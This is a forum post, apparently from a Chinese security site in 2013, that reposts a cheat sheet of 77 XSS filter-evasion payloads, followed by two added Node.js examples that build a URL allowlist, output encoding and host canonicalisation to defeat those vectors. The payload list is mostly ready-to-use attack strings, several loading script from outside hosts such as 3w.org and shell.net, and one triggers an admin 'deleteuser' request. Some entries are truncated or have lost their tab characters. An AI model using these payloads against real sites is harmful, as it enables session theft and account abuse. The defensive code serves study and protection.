XSS attack roundup

Posted 2013-4-19 19:22:37
It seems there is not much XSS material on t00ls; I saw something good and copied it over, in case any of you want to bookmark it.
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML entity encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>
(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>
(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>
(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=&#x6A&#x61&#x76&#x61..omitted..&#x58&#x53&#x53&#x27&#x29>
(11) Embedded tab, splitting up "javascript"
<IMG SRC="jav ascript:alert('XSS');">
(12) Embedded encoded tab, splitting up "javascript"
<IMG SRC="jav ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">
(15) Multi-line embedded JavaScript injection, an extreme XSS example
<IMG SRC="javascript:alert('XSS')">
(16) Working around character limits (all pieces must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null character 2; null characters have basically no effect domestically, because there is nowhere to exploit them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) Spaces and meta characters before the script in an IMG tag
<IMG SRC=" javascript:alert('XSS');">
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Extraneous open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and a few other browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escaping JavaScript escapes
\";alert('XSS');//
(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) INPUT image
<INPUT SRC="javascript:alert('XSS');">
(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag
<BODY('XSS')>
(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">
(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37) Stylesheet LINK
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) list-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'>
(41) META with a URL
<META HTTP-EQUIV="refresh" CONTENT="0;URL=http://;URL=javascript:alert('XSS');">
(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">
(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">
(50) Anonymous tag with STYLE (made of an open angle bracket and a leading letter)
<XSS STYLE="xss:expression(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
(52) IMG STYLE method
exppression(alert("XSS"))'>
(53) STYLE background
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag: you can embed a Flash file that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>
(56) Using ActionScript inside Flash you can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
(57) XML namespace; the .HTC file must be on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JS is filtered, you can put the JS code inside an image and exploit it
<SCRIPT SRC=""></SCRIPT>
(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Bypassing symbol filters
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding
<A HREF="http://3w.org">XSS</A>
(70) IP as a decimal integer
<A HREF="http://3232235521">XSS</A>
(71) IP in hex
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>
(73) Mixed encoding
<A HREF="h tt p://6 6.000146.0x7.147/">XSS</A>
(74) Dropping "http:"
<A HREF="//www.google.com/">XSS</A>
(75) Dropping "www"
<A HREF="http://google.com/">XSS</A>
(76) Absolute DNS name with a trailing dot
<A HREF="http://www.google.com./">XSS</A>
(77) javascript: link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>

Original source: http://fuzzexp.org/u/0day/?p=14
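Added example, not part of the post above or of the cheat sheet it copies. Vectors (4), (10), (13) and (17) exist because filters compare the raw input against a fixed string; the code below shows that a substring blacklist misses all four, then does what a practitioner does instead: normalise the value the way the browser will (decode numeric character references, drop control characters and whitespace), allowlist the scheme, and encode the value for the HTML attribute context on output. Node.js, no dependencies. The function names are ours, and the payload strings are constructed here from the list above.

```javascript
// Constructed test inputs: four vectors from the list plus two benign URLs.
const PAYLOADS = {
  caseMix:   "JaVaScRiPt:alert('XSS')",                                               // (4)
  hexEntity: "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A;alert('XSS')",  // (10)
  newline:   "jav\nascript:alert('XSS');",                                            // (13)
  nulByte:   "java\u0000script:alert(\"XSS\")",                                       // (17)
  benign:    "https://example.com/page?x=1",
  relative:  "/images/logo.png",
};
const MALICIOUS = ["caseMix", "hexEntity", "newline", "nulByte"];

// The kind of check those vectors were written to defeat: a case-sensitive
// substring match on the raw, undecoded input.
function naiveBlocksJs(value) {
  return value.includes("javascript:");
}

// Numeric character reference to string; out-of-range code points become U+FFFD.
function decodeRef(code) {
  return code > 0x10ffff ? "\ufffd" : String.fromCodePoint(code);
}

// Decode &#NNN; and &#xHH; (the ';' is optional, as in the HTML parser), then
// remove every C0 control and space character, which browsers ignore when
// they extract the scheme from a URL. Used for classification only; the
// original string is what gets emitted.
function normalizeUrl(value) {
  return value
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => decodeRef(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => decodeRef(parseInt(d, 10)))
    .replace(/[\u0000-\u0020]/g, "")
    .toLowerCase();
}

// Allowlist, not blacklist: absolute http(s), site-relative paths, or a value
// with no scheme at all. javascript:, vbscript:, data: all fail here, and so
// does a protocol-relative "//host" (74), where '\' acts like '/'.
function isAllowedUrl(value) {
  const n = normalizeUrl(value);
  if (/^https?:\/\//.test(n)) return true;
  if (/^[\/\\]{2}/.test(n)) return false;
  if (n.startsWith("/")) return true;
  return !n.includes(":");
}

// Output encoding for the HTML attribute context (both quote characters included).
const ENTITY = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ENTITY[c]);
}

// Build an <a> tag: a rejected href is replaced, the survivor is encoded.
function renderLink(href, text) {
  const safeHref = isAllowedUrl(href) ? href : "#";
  return `<a href="${escapeHtml(safeHref)}">${escapeHtml(text)}</a>`;
}

// Which of the four vectors slip past each check.
function report() {
  return {
    naiveMissed: MALICIOUS.filter((k) => !naiveBlocksJs(PAYLOADS[k])),
    allowlistMissed: MALICIOUS.filter((k) => isAllowedUrl(PAYLOADS[k])),
  };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(report());
  console.log(renderLink(PAYLOADS.caseMix, "click"));
  console.log(renderLink(PAYLOADS.benign, "a<b"));
}
```

The normalised string is only ever used to decide; the attribute that reaches the page is the original value after entity encoding, so the decision and the output cannot drift apart. Stripping every character below 0x21 is deliberately broader than what browsers strip (they only ignore tab, LF and CR anywhere plus leading and trailing controls and spaces): for classification, over-stripping can only turn a relative URL into a rejected one, never a rejected one into an allowed one.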

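Added example, not part of the post above. Vectors (70) to (76) spell one host several ways, so a host allowlist that compares raw strings is defeated by any of them. The code below canonicalises IPv4 literals the way the WHATWG URL parser does (decimal, hex and octal parts, fewer than four parts, with the last part filling the remaining bytes), strips the trailing dot of (76), and then checks a link against an allowlist after resolving it against the page origin, which also covers the scheme-relative form of (74) and the javascript: link of (77). Node.js, no dependencies. The function names, the page origin BASE and the allowlist are assumptions of this example.

```javascript
// One dotted part of a numeric host: "0x.." is hex, a leading "0" is octal,
// anything else is decimal; non-numeric parts yield NaN.
function parseIpv4Part(part) {
  if (/^0x[0-9a-f]*$/i.test(part)) return part.length === 2 ? 0 : parseInt(part.slice(2), 16);
  if (/^0[0-7]+$/.test(part)) return parseInt(part, 8);
  if (/^\d+$/.test(part)) return parseInt(part, 10);
  return NaN;
}

// Dotted-decimal for numeric hosts, the lower-cased name without trailing dot
// for DNS names, or null for a numeric host no browser would accept.
function canonicalHost(host) {
  const h = host.toLowerCase().replace(/\.$/, "");            // (76) absolute DNS name
  const nums = h.split(".").map(parseIpv4Part);
  if (!nums.every(Number.isFinite)) return h;                 // some part is not a number
  if (nums.length > 4) return null;
  const last = nums[nums.length - 1];
  if (last >= 256 ** (5 - nums.length)) return null;          // last part covers the remaining bytes
  let value = last;
  for (let i = 0; i < nums.length - 1; i++) {
    if (nums[i] > 255) return null;
    value += nums[i] * 256 ** (3 - i);
  }
  return [value >>> 24, (value >>> 16) & 255, (value >>> 8) & 255, value & 255].join(".");
}

// Assumed origin of the page that carries the link (used to resolve "//host" and "/path").
const BASE = "https://app.example/";
// Assumed allowlist; note it holds canonical spellings only.
const ALLOWED_HOSTS = ["www.google.com", "192.168.0.1"];

// True only for http(s) links whose canonical host is on the allowlist.
function isAllowedLink(href, allowedHosts) {
  let url;
  try {
    url = new URL(href, BASE);
  } catch {
    return false;
  }
  if (url.protocol !== "http:" && url.protocol !== "https:") return false;  // (77) javascript:
  const host = canonicalHost(url.hostname);
  return host !== null && allowedHosts.includes(host);
}

if (typeof require !== "undefined" && require.main === module) {
  for (const h of ["3232235521", "0xc0.0xa8.0x00.0x01", "0300.0250.0000.0001", "66.000146.0x7.147", "www.google.com."]) {
    console.log(h, "->", canonicalHost(h));
  }
  console.log(isAllowedLink("//www.google.com/", ALLOWED_HOSTS), isAllowedLink("http://google.com/", ALLOWED_HOSTS));
}
```

Node's own URL parser already rewrites the decimal, hex and octal forms to dotted-decimal, so canonicalHost is mostly there for the trailing dot and for code paths that receive a host string without going through `new URL`; it does not reproduce every WHATWG failure case (for instance "08" is read as decimal here and rejected by the spec). Note that (75) is a genuinely different host, not an alias, which is why it stays off the list.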